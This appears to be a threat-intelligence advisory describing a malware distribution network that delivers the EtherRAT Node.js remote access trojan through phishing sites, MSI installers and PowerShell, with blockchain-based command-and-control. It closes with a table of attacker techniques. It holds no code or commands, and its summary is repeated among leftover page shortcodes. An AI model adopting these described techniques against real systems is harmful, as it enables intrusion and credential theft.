EXECUTIVE SUMMARY:
A large-scale malicious infrastructure has been identified distributing EtherRAT malware alongside phishing pages, fraudulent software, malicious documents, and remote access tools. The activity relies on a network of interconnected websites that masquerade as legitimate services and software resources to attract victims. The operation demonstrates a coordinated approach to malware delivery, credential theft, and unauthorized system access, increasing the risk to both individual users and organizations.[/subscribe_to_unlock_form]
EXECUTIVE SUMMARY:
A large-scale malicious infrastructure has been identified distributing EtherRAT malware alongside phishing pages, fraudulent software, malicious documents, and remote access tools. The activity relies on a network of interconnected websites that masquerade as legitimate services and software resources to attract victims. The operation demonstrates a coordinated approach to malware delivery, credential theft, and unauthorized system access, increasing the risk to both individual users and organizations.[emaillocker id="1283"]
The operation distributes EtherRAT, a Node.js-based remote access trojan capable of granting attackers full control over compromised systems and enabling execution of commands received from command-and-control infrastructure. Delivery mechanisms include MSI installers, PowerShell scripts, and other staged download methods hosted within publicly accessible directories. The malware leverages blockchain-based techniques to retrieve command-and-control information, improving resilience against disruption efforts. Analysis of related domains and infrastructure uncovered additional resources hosting phishing kits, malicious documents, remote management software, and other malware families, indicating a diversified distribution network supporting multiple attack objectives.
This campaign reflects how threat actors are combining phishing operations, malware distribution, and deceptive software offerings within a single infrastructure to maximize victim reach and persistence. Organizations should strengthen web filtering, monitor for unauthorized remote access tools, verify software sources before installation, and maintain effective endpoint protection. User awareness training and proactive threat monitoring remain essential to reducing exposure to phishing attempts, malware infections, and credential theft associated with such multi-purpose malicious infrastructures.
THREAT PROFILE:
| Tactic | Technique Id | Technique | Sub-technique |
| Initial Access | T1566.001 | Phishing | Spearphishing Attachment |
| T1566.002 | Spearphishing Link | ||
| Execution | T1059.001 | Command and Scripting Interpreter | PowerShell |
| T1204.002 | User Execution | Malicious File | |
| T1204.001 | Malicious Link | ||
| Persistence | T1547.001 | Boot or Logon Autostart Execution | Registry Run Keys / Startup Folder |
| Stealth | T1027.013 | Obfuscated Files or Information | Encrypted/Encoded File |
| T1218.007 | System Binary Proxy Execution | Msiexec | |
| Discovery | T1082 | System Information Discovery | - |
| T1016.001 | System Network Configuration Discovery | Internet Connection Discovery | |
| Collection | T1005 | Data from Local System | - |
| Command and Control | T1071.001 | Application Layer Protocol | Web Protocols |
| T1102.001 | Web Service | Dead Drop Resolver | |
| T1090.003 | Proxy | Multi-hop Proxy | |
| T1573.001 | Encrypted Channel | Symmetric Cryptography | |
| Exfiltration | T1041 | Exfiltration Over C2 Channel | - |
REFERENCES:
The following reports contain further technical details:
[/emaillocker]